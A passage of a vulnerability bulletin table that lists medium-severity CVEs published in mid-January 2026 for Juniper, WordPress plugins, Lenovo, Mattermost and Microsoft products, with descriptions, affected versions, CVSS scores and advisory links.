| Juniper Networks--Junos OS | A Use After Free vulnerability in the chassis daemon (chassisd) of Juniper Networks Junos OS and Junos OS Evolved allows a network-based attacker authenticated with low privileges to cause a Denial-of-Service (DoS). When telemetry collectors are frequently subscribing and unsubscribing to sensors continuously over a long period of time, telemetry-capable processes like chassisd, rpd or mib2d will crash and restart, which - depending on the process - can cause a complete outage until the system has recovered. This issue affects: Junos OS: * all versions before 22.4R3-S8, * 23.2 versions before 23.2R2-S5, * 23.4 versions before 23.4R2; Junos OS Evolved: * all versions before 22.4R3-S8-EVO, * 23.2 versions before 23.2R2-S5-EVO, * 23.4 versions before 23.4R2-EVO. | 2026-01-15 | 6.5 | CVE-2026-21921 | https://supportportal.juniper.net/JSA106021 https://kb.juniper.net/JSA106021 |
| Juniper Networks--Junos OS | An Untrusted Pointer Dereference vulnerability in the routing protocol daemon (rpd) of Juniper Networks Junos OS and Junos OS Evolved allows a local, authenticated attacker with low privileges to cause a Denial-of-Service (DoS). When the command 'show route < ( receive-protocol | advertising-protocol ) bgp > detail' is executed, and at least one of the routes in the intended output has specific attributes, this will cause an rpd crash and restart. 'show route ... extensive' is not affected. This issue affects: Junos OS: * all versions before 22.4R3-S8, * 23.2 versions before 23.2R2-S5, * 23.4 versions before 23.4R2-S5, * 24.2 versions before 24.2R2-S2, * 24.4 versions before 24.4R2; Junos OS Evolved: * all versions before 22.4R3-S8-EVO, * 23.2 versions before 23.2R2-S5-EVO, * 23.4 versions before 23.4R2-S6-EVO, * 24.2 versions before 24.2R2-S2-EVO, * 24.4 versions before 24.4R2-EVO. | 2026-01-15 | 5.5 | CVE-2025-59959 | https://supportportal.juniper.net/ https://kb.juniper.net/JSA103148 |
| Juniper Networks--Junos OS | An Incorrect Permission Assignment for Critical Resource vulnerability in the Juniper DHCP daemon (jdhcpd) of Juniper Networks Junos OS and Junos OS Evolved allows a local, low-privileged user to write to the Unix socket used to manage the jdhcpd process, resulting in complete control over the resource. This vulnerability allows any low-privileged user logged into the system to connect to the Unix socket and issue commands to manage the DHCP service, in essence, taking administrative control of the local DHCP server or DHCP relay. This issue affects: Junos OS: * all versions before 21.2R3-S10, * all versions of 22.2, * from 21.4 before 21.4R3-S12, * from 22.4 before 22.4R3-S8, * from 23.2 before 23.2R2-S5, * from 23.4 before 23.4R2-S6, * from 24.2 before 24.2R2-S2, * from 24.4 before 24.4R2, * from 25.2 before 25.2R1-S1, 25.2R2; Junos OS Evolved: * all versions before 22.4R3-S8-EVO, * from 23.2 before 23.2R2-S5-EVO, * from 23.4 before 23.4R2-S6-EVO, * from 24.2 before 24.2R2-S2-EVO, * from 24.4 before 24.4R2-EVO, * from 25.2 before 25.2R1-S1-EVO, 25.2R2-EVO. | 2026-01-15 | 5.5 | CVE-2025-59961 | https://supportportal.juniper.net/ https://kb.juniper.net/JSA103150 |
| Juniper Networks--Junos OS | A NULL Pointer Dereference vulnerability in the chassis daemon (chassisd) of Juniper Networks Junos OS on MX, SRX and EX Series allows a local attacker with low privileges to cause a Denial-of-Service (DoS). When a user executes the 'show chassis' command with specifically crafted options, chassisd will crash and restart. Due to this all components but the Routing Engine (RE) in the chassis are reinitialized, which leads to a complete service outage, which the system automatically recovers from. This issue affects: Junos OS on MX, SRX and EX Series: * all versions before 22.4R3-S8, * 23.2 versions before 23.2R2-S5, * 23.4 versions before 23.4R2-S6, * 24.2 versions before 24.2R2-S2, * 24.4 versions before 24.4R2. | 2026-01-15 | 5.5 | CVE-2025-60007 | https://supportportal.juniper.net/ https://kb.juniper.net/JSA103173 |
| Juniper Networks--Junos OS | An Improper Check for Unusual or Exceptional Conditions vulnerability in the routing protocol daemon (rpd) of Juniper Networks Junos OS and Junos OS Evolved allows an unauthenticated, network-based attacker to cause an availability impact for downstream devices. When an affected device receives a specific optional, transitive BGP attribute over an existing BGP session, it will be erroneously modified before propagation to peers. When the attribute is detected as malformed by the peers, these peers will most likely terminate the BGP sessions with the affected devices and thereby cause an availability impact due to the resulting routing churn. This issue affects: Junos OS: * all versions before 22.4R3-S8, * 23.2 versions before 23.2R2-S5 * 23.4 versions before 23.4R2-S6, * 24.2 versions before 24.2R2-S2, * 24.4 versions before 24.4R2; Junos OS Evolved: * all versions before 22.4R3-S8-EVO, * 23.2 versions before 23.2R2-S5-EVO, * 23.4 versions before 23.4R2-S6-EVO, * 24.2 versions before 24.2R2-S2-EVO, * 24.4 versions before 24.4R2-EVO. | 2026-01-15 | 5.8 | CVE-2025-60011 | https://supportportal.juniper.net/ https://kb.juniper.net/JSA103161 |
| Juniper Networks--Junos OS | A Time-of-check Time-of-use (TOCTOU) Race Condition vulnerability in the method to collect FPC Ethernet firmware statistics of Juniper Networks Junos OS on MX10k Series allows a local, low-privileged attacker executing the 'show system firmware' CLI command to cause an LC480 or LC2101 line card to reset. On MX10k Series systems with LC480 or LC2101 line cards, repeated execution of the 'show system firmware' CLI command can cause the line card to crash and restart. Additionally, some time after the line card crashes, chassisd may also crash and restart, generating a core dump.This issue affects Junos OS on MX10k Series: * all versions before 21.2R3-S10, * from 21.4 before 21.4R3-S9, * from 22.2 before 22.2R3-S7, * from 22.4 before 22.4R3-S6, * from 23.2 before 23.2R2-S2, * from 23.4 before 23.4R2-S3, * from 24.2 before 24.2R2. | 2026-01-15 | 5.5 | CVE-2026-21912 | https://supportportal.juniper.net/JSA106011 https://kb.juniper.net/JSA106011 |
| Juniper Networks--Junos OS Evolved | An Incorrect Calculation vulnerability in the Layer 2 Control Protocol Daemon (l2cpd) of Juniper Networks Junos OS Evolved allows an unauthenticated network-adjacent attacker flapping the management interface to cause the learning of new MACs over label-switched interfaces (LSI) to stop while generating a flood of logs, resulting in high CPU usage. When the issue is seen, the following log message will be generated: op:1 flag:0x6 mac:xx:xx:xx:xx:xx:xx bd:2 ifl:13302 reason:0(REASON_NONE) i-op:6(INTRNL_OP_HW_FORCE_DELETE) status:10 lstatus:10 err:26(GETIFBD_VALIDATE_FAILED) err-reason 4(IFBD_VALIDATE_FAIL_EPOCH_MISMATCH) hw_wr:0x4 ctxsync:0 fwdsync:0 rtt-id:51 p_ifl:0 fwd_nh:0 svlbnh:0 event:- smask:0x100000000 dmask:0x0 mplsmask 0x1 act:0x5800 extf:0x0 pfe-id 0 hw-notif-ifl 13302 programmed-ifl 4294967295 pseudo-vtep underlay-ifl-idx 0 stack:GET_MAC, ALLOCATE_MAC, GET_IFL, GET_IFF, GET_IFBD, STOP, This issue affects Junos OS Evolved: * all versions before 21.4R3-S7-EVO, * from 22.2 before 22.2R3-S4-EVO, * from 22.3 before 22.3R3-S3-EVO, * from 22.4 before 22.4R3-S2-EVO, * from 23.2 before 23.2R2-S1-EVO, * from 23.4 before 23.4R1-S2-EVO, 23.4R2-EVO. | 2026-01-15 | 6.5 | CVE-2026-21911 | https://supportportal.juniper.net/JSA106010 https://kb.juniper.net/JSA106010 |
| Juniper Networks--Junos Space | A Use of a Broken or Risky Cryptographic Algorithm vulnerability in the TLS/SSL server of Juniper Networks Junos Space allows the use of static key ciphers (ssl-static-key-ciphers), reducing the confidentiality of on-path traffic communicated across the connection. These ciphers also do not support Perfect Forward Secrecy (PFS), affecting the long-term confidentiality of encrypted communications.This issue affects all versions of Junos Space before 24.1R5. | 2026-01-15 | 5.9 | CVE-2026-21907 | https://supportportal.juniper.net/JSA106006 https://kb.juniper.net/JSA106006 |
| Juniper Networks--Paragon Automation (Pathfinder, Planner, Insights) | A clickjacking vulnerability exists in the web portal of Juniper Networks Paragon Automation (Pathfinder, Planner, Insights) due to the application's failure to set appropriate X-Frame-Options and X-Content-Type HTTP headers. This vulnerability allows an attacker to trick users into interacting with the interface under the attacker's control. This issue affects all versions of Paragon Automation (Pathfinder, Planner, Insights) before 24.1.1. | 2026-01-15 | 6.1 | CVE-2025-52987 | https://supportportal.juniper.net/ https://kb.juniper.net/JSA103145 |
| kalcaddle--kodbox | A vulnerability was detected in kalcaddle kodbox up to 1.61.10. This issue affects some unknown processing of the file /?explorer/index/zip of the component Compression Handler. The manipulation results in command injection. The attack may be launched remotely. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-17 | 6.3 | CVE-2026-1066 | VDB-341665 | kalcaddle kodbox Compression zip command injection VDB-341665 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #731436 | kalcaddle kodbox <=1.61.10 Command Injection https://github.com/DReazer/CV3/blob/main/Krce.md |
| keesiemeijer--Related Posts by Taxonomy | The Related Posts by Taxonomy plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'related_posts_by_tax' shortcode in all versions up to, and including, 2.7.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-16 | 6.4 | CVE-2026-0916 | https://www.wordfence.com/threat-intel/vulnerabilities/id/0582fe7d-884c-4019-837a-861d36ccc842?source=cve https://plugins.trac.wordpress.org/browser/related-posts-by-taxonomy/tags/2.7.6/includes/functions.php#L259 |
| kimai--kimai | Kimai is a web-based multi-user time-tracking application. Prior to version 2.46.0, Kimai's export functionality uses a Twig sandbox with an overly permissive security policy (`DefaultPolicy`) that allows arbitrary method calls on objects available in the template context. An authenticated user with export permissions can deploy a malicious Twig template that extracts sensitive information including environment variables, all user password hashes, serialized session tokens, and CSRF tokens. Version 2.46.0 patches this issue. | 2026-01-18 | 6.8 | CVE-2026-23626 | https://github.com/kimai/kimai/security/advisories/GHSA-jg2j-2w24-54cg https://github.com/kimai/kimai/pull/5757 https://github.com/kimai/kimai/commit/6a86afb5fd79f6c1825060b87c09bd1909c2e86f https://github.com/kimai/kimai/releases/tag/2.46.0 |
| kiwicommerce--PDF Resume Parser | The PDF Resume Parser plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.0. This is due to the plugin registering an AJAX action handler that is accessible to unauthenticated users and exposes SMTP configuration data including credentials. This makes it possible for unauthenticated attackers to extract sensitive SMTP credentials (username and password) from the WordPress configuration, which could be leveraged to compromise email accounts and potentially gain unauthorized access to other systems using the same credentials. | 2026-01-14 | 5.3 | CVE-2025-14464 | https://www.wordfence.com/threat-intel/vulnerabilities/id/8a84bcc2-23e0-4624-89a4-7bbb1b34c498?source=cve https://plugins.trac.wordpress.org/browser/pdf-resume-parser/trunk/pdf-resume-parser.php#L309 https://plugins.trac.wordpress.org/browser/pdf-resume-parser/tags/1.0/pdf-resume-parser.php#L309 |
| kunzemarketing--Kunze Law | The Kunze Law plugin for WordPress is vulnerable to Stored Cross-Site Scripting via plugin's shortcode in all versions up to, and including, 2.1 due to the plugin fetching HTML content from a remote server and injecting it into pages without any sanitization or escaping. This makes it possible for authenticated attackers, with Administrator-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. Additional presence of a path traversal vulnerability in the shortcode name allows writing malicious HTML files to arbitrary writable locations on the server. | 2026-01-14 | 4.4 | CVE-2025-15486 | https://www.wordfence.com/threat-intel/vulnerabilities/id/f7957619-e562-4043-920d-275c58684328?source=cve https://plugins.trac.wordpress.org/browser/kunze-law/tags/2.1/kunze-law.php#L406 https://plugins.trac.wordpress.org/browser/kunze-law/tags/2.1/kunze-law.php#L531 |
| Laborator--Kalium 3 | Creative WordPress & WooCommerce Theme | The Kalium 3 | Creative WordPress & WooCommerce Theme theme for WordPress is vulnerable to unauthorized email sending due to a missing capability check on the kalium_vc_contact_form_request() function in all versions up to, and including, 3.29. This makes it possible for unauthenticated attackers to use the theme an an open mail relay and send email to arbitrary email addresses on the server's behalf. | 2026-01-15 | 5.3 | CVE-2025-12895 | https://www.wordfence.com/threat-intel/vulnerabilities/id/0e65a794-1901-4e54-be4f-9422fe444057?source=cve https://themeforest.net/item/kalium-creative-theme-for-professionals/10860525 https://documentation.laborator.co/kb/kalium/kalium-changelog/ |
| LabRedesCefetRJ--WeGIA | WeGIA is a web manager for charitable institutions. Prior to 3.6.2, a Stored Cross-Site Scripting (XSS) vulnerability was identified in the html/atendido/cadastro_ocorrencia.php endpoint of the WeGIA application. The application does not sanitize user-controlled data before rendering it inside the "Atendido" selection dropdown. This vulnerability is fixed in 3.6.2. | 2026-01-16 | 4.3 | CVE-2026-23724 | https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-3r3q-8573-g3cq https://github.com/LabRedesCefetRJ/WeGIA/pull/1333 https://github.com/LabRedesCefetRJ/WeGIA/releases/tag/3.6.2 |
| LabRedesCefetRJ--WeGIA | WeGIA is a web manager for charitable institutions. Prior to 3.6.2, The web application is vulnerable to clickjacking attacks. The WeGIA application does not send any defensive HTTP headers related to framing protection. In particular, X-Frame-Options is missing andContent-Security-Policy with frame-ancestors directive is not configured. Because of this, an attacker can load any WeGIA page inside a malicious HTML document, overlay deceptive elements, hide real buttons, or force accidental interaction with sensitive workflows. This vulnerability is fixed in 3.6.2. | 2026-01-16 | 4.3 | CVE-2026-23731 | https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-99qp-hjvh-c59q https://github.com/LabRedesCefetRJ/WeGIA/pull/1333 https://github.com/LabRedesCefetRJ/WeGIA/releases/tag/3.6.2 |
| Lenovo--ThinkPad L13 Gen 6 BIOS | A potential vulnerability was reported in the BIOS of L13 Gen 6, L13 Gen 6 2-in-1, L14 Gen 6, and L16 Gen 2 ThinkPads which could result in Secure Boot being disabled even when configured as "On" in the BIOS setup menu. This issue only affects systems where Secure Boot is set to User Mode. | 2026-01-14 | 6.5 | CVE-2026-0421 | https://support.lenovo.com/us/en/product_security/LEN-210688 |
| Lenovo--ThinkPlus FU100 | A potential vulnerability was reported in some ThinkPlus USB drives that could allow a user with physical access to read data stored on the drive. | 2026-01-14 | 6.8 | CVE-2025-13453 | https://iknow.lenovo.com.cn/detail/436983 |
| Lenovo--ThinkPlus FU100 | A potential vulnerability was reported in ThinkPlus configuration software that could allow a local authenticated user to gain access to sensitive device information. | 2026-01-14 | 4.7 | CVE-2025-13454 | https://iknow.lenovo.com.cn/detail/436983 |
| Lenovo--Vantage | An improper link following vulnerability was reported in the SmartPerformanceAddin for Lenovo Vantage that could allow an authenticated local user to perform an arbitrary file deletion with elevated privileges. | 2026-01-14 | 5.5 | CVE-2025-13154 | https://support.lenovo.com/us/en/product_security/LEN-208293 |
| linknacional--Rede Ita for WooCommerce Payment PIX, Credit Card and Debit | The Rede Itaú for WooCommerce plugin for WordPress is vulnerable to order status manipulation due to insufficient verification of data authenticity in all versions up to, and including, 5.1.2. This is due to the plugin failing to verify the authenticity of payment callbacks. This makes it possible for unauthenticated attackers to manipulate WooCommerce order statuses, either marking unpaid orders as paid, or failed. | 2026-01-16 | 5.3 | CVE-2026-0939 | https://www.wordfence.com/threat-intel/vulnerabilities/id/722c666b-913f-4289-82e6-30aa0a3abc2b?source=cve https://plugins.trac.wordpress.org/browser/woo-rede/tags/5.1.2/Includes/LknIntegrationRedeForWoocommerceWcEndpoint.php#L45 https://plugins.trac.wordpress.org/browser/woo-rede/tags/5.1.2/Includes/LknIntegrationRedeForWoocommerceWcEndpoint.php#L460 https://plugins.trac.wordpress.org/browser/woo-rede/tags/5.1.2/Includes/LknIntegrationRedeForWoocommerceWcEndpoint.php#L710 |
| linknacional--Rede Ita for WooCommerce Payment PIX, Credit Card and Debit | The Rede Itaú for WooCommerce - Payment PIX, Credit Card and Debit plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the clearOrderLogs() function in all versions up to, and including, 5.1.2. This makes it possible for unauthenticated attackers to delete the Rede Order Logs metadata from all WooCommerce orders. | 2026-01-16 | 5.3 | CVE-2026-0942 | https://www.wordfence.com/threat-intel/vulnerabilities/id/4927c060-f2b2-4916-b049-1442bba63e98?source=cve https://plugins.trac.wordpress.org/browser/woo-rede/tags/5.1.2/Includes/LknIntegrationRedeForWoocommerceWcEndpoint.php#L42 https://plugins.trac.wordpress.org/browser/woo-rede/tags/5.1.2/Includes/LknIntegrationRedeForWoocommerceWcEndpoint.php#L58 |
| lobehub--lobe-chat | LobeChat is an open source chat application platform. Prior to version 2.0.0-next.180, a stored Cross-Site Scripting (XSS) vulnerability in the Mermaid artifact renderer allows attackers to execute arbitrary JavaScript within the application context. This XSS can be escalated to Remote Code Execution (RCE) by leveraging the exposed `electronAPI` IPC bridge, allowing attackers to run arbitrary system commands on the victim's machine. Version 2.0.0-next.180 patches the issue. | 2026-01-18 | 6.4 | CVE-2026-23733 | https://github.com/lobehub/lobe-chat/security/advisories/GHSA-4gpc-rhpj-9443 |
| logiceverest--Shipping Rates by City for WooCommerce | The Flat Shipping Rate by City for WooCommerce plugin for WordPress is vulnerable to time-based SQL Injection via the 'cities' parameter in all versions up to, and including, 1.0.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Shop Manager-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | 2026-01-14 | 4.9 | CVE-2026-0678 | https://www.wordfence.com/threat-intel/vulnerabilities/id/4ada476b-6978-4c38-a5d3-67266a709a3e?source=cve https://plugins.trac.wordpress.org/browser/flat-shipping-rate-by-city-for-woocommerce/trunk/shipping-method-class.php#L154 https://plugins.trac.wordpress.org/browser/flat-shipping-rate-by-city-for-woocommerce/tags/1.0.3/shipping-method-class.php#L154 |
| lottiefile--LottieFiles Lottie block for Gutenberg | The LottieFiles - Lottie block for Gutenberg plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.0.0 via the `/wp-json/lottiefiles/v1/settings/` REST API endpoint. This makes it possible for unauthenticated attackers to retrieve the site owner's LottieFiles.com account credentials including their API access token and email address when the 'Share LottieFiles account with other WordPress users' option is enabled. | 2026-01-14 | 5.3 | CVE-2026-0717 | https://www.wordfence.com/threat-intel/vulnerabilities/id/19b159ca-4b41-48b4-880d-9b9dc44b3463?source=cve https://plugins.trac.wordpress.org/browser/lottiefiles/tags/3.0.0/src/common.php?marks=21,122#L21 |
| lwj--flow | A security vulnerability has been detected in lwj flow up to a3d2fe8133db9d3b50fda4f66f68634640344641. This affects the function uploadFile of the file \flow-master\flow-front-rest\src\main\java\com\dragon\flow\web\resource\flow\FormResource.java of the component SVG File Handler. The manipulation of the argument File leads to unrestricted upload. The attack is possible to be carried out remotely. The exploit has been disclosed publicly and may be used. This product adopts a rolling release strategy to maintain continuous delivery. Therefore, version details for affected or updated releases cannot be specified. The project was informed of the problem early through an issue report but has not responded yet. | 2026-01-18 | 6.3 | CVE-2026-1126 | VDB-341718 | lwj flow SVG File FormResource.java uploadFile unrestricted upload VDB-341718 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #735122 | https://gitee.com/lwj/flow flowable 1.0 Arbitrary File Upload https://gitee.com/lwj/flow/issues/IDIQSE |
| mailerlite--MailerLite WooCommerce integration | The MailerLite - WooCommerce integration plugin for WordPress is vulnerable to unauthorized data modification and deletion in all versions up to, and including, 3.1.3. This is due to missing capability checks on the resetIntegration() function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to reset the plugin's integration settings, delete all plugin options, and drop the plugin's database tables (woo_mailerlite_carts and woo_mailerlite_jobs), resulting in complete loss of plugin data including customer abandoned cart information and sync job history. | 2026-01-16 | 6.5 | CVE-2026-1000 | https://www.wordfence.com/threat-intel/vulnerabilities/id/e20deec4-f40c-4bd3-91f7-6a9d643a5520?source=cve https://plugins.trac.wordpress.org/browser/woo-mailerlite/tags/3.1.3/includes/WooMailerLite.php#L127 https://plugins.trac.wordpress.org/browser/woo-mailerlite/tags/3.1.3/admin/controllers/WooMailerLiteAdminSettingsController.php#L231 https://plugins.trac.wordpress.org/browser/woo-mailerlite/tags/3.1.3/includes/migrations/WooMailerLiteMigration.php#L33 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3415073%40woo-mailerlite%2Ftrunk&old=3399626%40woo-mailerlite%2Ftrunk&sfp_email=&sfph_mail= |
| makesweat--Makesweat | The Makesweat plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'makesweat_clubid' setting in all versions up to, and including, 0.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-14 | 4.4 | CVE-2025-13627 | https://www.wordfence.com/threat-intel/vulnerabilities/id/88dec08d-cb27-4ea8-853e-0c12dd0a6ab6?source=cve https://it.wordpress.org/plugins/makesweat/ https://plugins.trac.wordpress.org/browser/makesweat/trunk/makesweat.php#L64 https://plugins.trac.wordpress.org/browser/makesweat/tags/0.1/makesweat.php#L64 https://plugins.trac.wordpress.org/browser/makesweat/trunk/makesweat.php#L85 https://plugins.trac.wordpress.org/browser/makesweat/tags/0.1/makesweat.php#L85 |
| mallsop--List Site Contributors | The List Site Contributors plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'alpha' parameter in versions up to, and including, 1.1.8 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2026-01-14 | 6.1 | CVE-2026-0594 | https://www.wordfence.com/threat-intel/vulnerabilities/id/026a2e0d-4d30-4133-9118-055026aa9f4a?source=cve https://plugins.trac.wordpress.org/browser/list-site-contributors/trunk/list-site-contributors.php#L435 https://plugins.trac.wordpress.org/browser/list-site-contributors/tags/1.1.8/list-site-contributors.php#L435 |
| Mattermost--Mattermost | Mattermost versions 10.11.x <= 10.11.8, 11.1.x <= 11.1.1, 11.0.x <= 11.0.6 fail to prevent infinite re-renders on API errors which allows authenticated users to cause application-level DoS via triggering unbounded component re-render loops. | 2026-01-16 | 6.8 | CVE-2025-14435 | https://mattermost.com/security-updates |
| memsource--Phrase TMS Integration for WordPress | The Phrase TMS Integration for WordPress plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'wp_ajax_delete_log' AJAX endpoint in all versions up to, and including, 4.7.5. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete log files. | 2026-01-17 | 4.3 | CVE-2025-12168 | https://www.wordfence.com/threat-intel/vulnerabilities/id/396f2426-7bc4-4221-bc48-920bec5af6e5?source=cve https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3426034%40memsource-connector&new=3426034%40memsource-connector&sfp_email=&sfph_mail= |
| metagauss--EventPrime Events Calendar, Bookings and Tickets | The EventPrime - Events Calendar, Bookings and Tickets plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.2.7.0 via the REST API. This makes it possible for unauthenticated attackers to extract sensitive booking data including user names, email addresses, ticket details, payment information, and order keys when the API is enabled by an administrator. The vulnerability was partially patched in version 4.2.7.0. | 2026-01-13 | 5.3 | CVE-2025-14507 | https://www.wordfence.com/threat-intel/vulnerabilities/id/4b170ed1-72ee-40b6-9882-e978d630f6bb?source=cve https://plugins.trac.wordpress.org/browser/eventprime-event-calendar-management/trunk/includes/class-eventprime-rest-api.php#L447 https://plugins.trac.wordpress.org/browser/eventprime-event-calendar-management/trunk/includes/class-eventprime-rest-api.php#L651 https://plugins.trac.wordpress.org/changeset/3422587/ https://plugins.trac.wordpress.org/changeset/3432454/ |
| Microsoft--Microsoft SharePoint Enterprise Server 2016 | Server-side request forgery (ssrf) in Microsoft Office SharePoint allows an authorized attacker to disclose information over a network. | 2026-01-13 | 5.4 | CVE-2026-20958 | Microsoft SharePoint Information Disclosure Vulnerability |
| Microsoft--Microsoft SharePoint Enterprise Server 2016 | Improper neutralization of input during web page generation ('cross-site scripting') in Microsoft Office SharePoint allows an authorized attacker to perform spoofing over a network. | 2026-01-13 | 4.6 | CVE-2026-20959 | Microsoft SharePoint Server Spoofing Vulnerability |
| Microsoft--Windows 10 Version 1809 | Improper input validation in Windows LDAP - Lightweight Directory Access Protocol allows an authorized attacker to perform tampering over a network. | 2026-01-13 | 6.5 | CVE-2026-20812 | LDAP Tampering Vulnerability |
| Microsoft--Windows 10 Version 1809 | Exposure of sensitive information to an unauthorized actor in Windows Remote Procedure Call allows an unauthorized attacker to disclose information locally. | 2026-01-13 | 6.2 | CVE-2026-20821 | Remote Procedure Call Information Disclosure Vulnerability |
| Microsoft--Windows 10 Version 1809 | Exposure of sensitive information to an unauthorized actor in Windows Shell allows an authorized attacker to perform spoofing over a network. | 2026-01-13 | 6.5 | CVE-2026-20847 | Microsoft Windows File Explorer Spoofing Vulnerability |
| Microsoft--Windows 10 Version 1809 | External control of file name or path in Windows NTLM allows an unauthorized attacker to perform spoofing over a network. | 2026-01-13 | 6.5 | CVE-2026-20872 | NTLM Hash Disclosure Spoofing Vulnerability |
| Microsoft--Windows 10 Version 1809 | External control of file name or path in Windows NTLM allows an unauthorized attacker to perform spoofing over a network. | 2026-01-13 | 6.5 | CVE-2026-20925 | NTLM Hash Disclosure Spoofing Vulnerability |
| Microsoft--Windows 10 Version 1809 | Windows Secure Boot stores Microsoft certificates in the UEFI KEK and DB. These original certificates are approaching expiration, and devices containing affected certificate versions must update them to maintain Secure Boot functionality and avoid compromising security by losing security fixes related to Windows boot manager or Secure Boot. The operating system's certificate update protection mechanism relies on firmware components that might contain defects, which can cause certificate trust updates to fail or behave unpredictably. This leads to potential disruption of the Secure Boot trust chain and requires careful validation and deployment to restore intended security guarantees. Certificate Authority (CA) Location Purpose Expiration Date Microsoft Corporation KEK CA 2011 KEK Signs updates to the DB and DBX 06/24/2026 Microsoft Corporation UEFI CA 2011 DB Signs 3rd party boot loaders, Option ROMs, etc. 06/27/2026 Microsoft Windows Production PCA 2011 DB Signs the Windows Boot Manager 10/19/2026 For more information see this CVE and Windows Secure Boot certificate expiration and CA updates. | 2026-01-13 | 6.4 | CVE-2026-21265 | Secure Boot Certificate Expiration Security Feature Bypass Vulnerability |
| Microsoft--Windows 10 Version 1809 | Exposure of sensitive information to an unauthorized actor in Desktop Windows Manager allows an authorized attacker to disclose information locally. | 2026-01-13 | 5.5 | CVE-2026-20805 | Desktop Window Manager Information Disclosure Vulnerability |
| Microsoft--Windows 10 Version 1809 | Exposure of sensitive information to an unauthorized actor in Windows File Explorer allows an authorized attacker to disclose information locally. | 2026-01-13 | 5.5 | CVE-2026-20823 | Windows File Explorer Information Disclosure Vulnerability |
| Microsoft--Windows 10 Version 1809 | Protection mechanism failure in Windows Remote Assistance allows an unauthorized attacker to bypass a security feature locally. | 2026-01-13 | 5.5 | CVE-2026-20824 | Windows Remote Assistance Security Feature Bypass Vulnerability |
| Microsoft--Windows 10 Version 1809 | Exposure of sensitive information to an unauthorized actor in Tablet Windows User Interface (TWINUI) Subsystem allows an authorized attacker to disclose information locally. | 2026-01-13 | 5.5 | CVE-2026-20827 | Tablet Windows User Interface (TWINUI) Subsystem Information Disclosure Vulnerability |
| Microsoft--Windows 10 Version 1809 | Out-of-bounds read in Windows TPM allows an authorized attacker to disclose information locally. | 2026-01-13 | 5.5 | CVE-2026-20829 | TPM Trustlet Information Disclosure Vulnerability |
| Microsoft--Windows 10 Version 1809 | Improper access control in Windows Client-Side Caching (CSC) Service allows an authorized attacker to disclose information locally. | 2026-01-13 | 5.5 | CVE-2026-20839 | Windows Client-Side Caching (CSC) Service Information Disclosure Vulnerability |
| Microsoft--Windows 10 Version 1809 | Exposure of sensitive information to an unauthorized actor in Windows Management Services allows an authorized attacker to disclose information locally. | 2026-01-13 | 5.5 | CVE-2026-20862 | Windows Management Services Information Disclosure Vulnerability |
| Microsoft--Windows 10 Version 1809 | Concurrent execution using shared resource with improper synchronization ('race condition') in Windows SMB Server allows an authorized attacker to deny service over a network. | 2026-01-13 | 5.3 | CVE-2026-20927 | Windows SMB Server Denial of Service Vulnerability |
| Microsoft--Windows 10 Version 1809 | Exposure of sensitive information to an unauthorized actor in Windows File Explorer allows an authorized attacker to disclose information locally. | 2026-01-13 | 5.5 | CVE-2026-20932 | Windows File Explorer Information Disclosure Vulnerability |
| Microsoft--Windows 10 Version 1809 | Exposure of sensitive information to an unauthorized actor in Windows File Explorer allows an authorized attacker to disclose information locally. | 2026-01-13 | 5.5 | CVE-2026-20937 | Windows File Explorer Information Disclosure Vulnerability |
| Microsoft--Windows 10 Version 1809 | Exposure of sensitive information to an unauthorized actor in Windows File Explorer allows an authorized attacker to disclose information locally. | 2026-01-13 | 5.5 | CVE-2026-20939 | Windows File Explorer Information Disclosure Vulnerability |
| Microsoft--Windows 10 Version 1809 | Improper access control in Windows Hyper-V allows an authorized attacker to disclose information locally. | 2026-01-13 | 4.4 | CVE-2026-20825 | Windows Hyper-V Information Disclosure Vulnerability |
| Microsoft--Windows 10 Version 1809 | Out-of-bounds read in Windows Internet Connection Sharing (ICS) allows an unauthorized attacker to disclose information with a physical attack. | 2026-01-13 | 4.6 | CVE-2026-20828 | Windows rndismp6.sys Information Disclosure Vulnerability |
| Microsoft--Windows 10 Version 1809 | Absolute path traversal in Windows Shell allows an unauthorized attacker to perform spoofing with a physical attack. | 2026-01-13 | 4.6 | CVE-2026-20834 | Windows Spoofing Vulnerability |
| Microsoft--Windows 10 Version 1809 | Out-of-bounds read in Windows NDIS allows an authorized attacker to disclose information with a physical attack. | 2026-01-13 | 4.3 | CVE-2026-20936 | Windows NDIS Information Disclosure Vulnerability |
| Microsoft--Windows 11 Version 25H2 | Untrusted pointer dereference in Windows Virtualization-Based Security (VBS) Enclave allows an unauthorized attacker to disclose information locally. | 2026-01-13 | 6.2 | CVE-2026-20935 | Windows Virtualization-Based Security (VBS) Information Disclosure Vulnerability |
